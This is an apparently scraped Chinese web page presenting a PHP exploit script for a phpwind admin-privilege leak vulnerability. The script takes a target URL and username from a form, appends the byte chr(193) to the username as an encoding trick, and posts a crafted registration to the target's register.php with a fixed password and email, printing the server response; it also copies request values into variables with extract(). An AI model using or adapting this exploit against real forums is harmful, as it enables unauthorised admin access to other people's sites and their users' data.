以下是引用片段:
<?php
if (empty($_GET['sub'])) {
print <<<EOT
<form action=”" method=”get”><br />
<input type=”text” name=”url” /><br />
<input type=”text” name=”regname” /><br />
<input type=”submit” name=”sub” value=”提交” />
</form>
EOT;
} else {
extract($_GET);
$regname .= chr(193);
$data = array(
‘regname’ => $regname,
‘regpwd’ => 147852,
‘regpwdrepeat’ => 147852,
‘regemail’ => ‘llll@Ll.com’,
‘regemailtoall’ => 1,
’step’ => 2
);
$url .= ‘/register.php’;
$includePath = ini_get(’include_path’);
$includePath .=’;D:\www\pear’;
ini_set(’include_path’, $includePath);
include(’HTTP/Client.php’);
$http = new HTTP_Client();
var_dump($http->post($url, $data));
}
|
[图文]phpwind管理权限泄露漏洞利用程序PHP版
您现在的位置: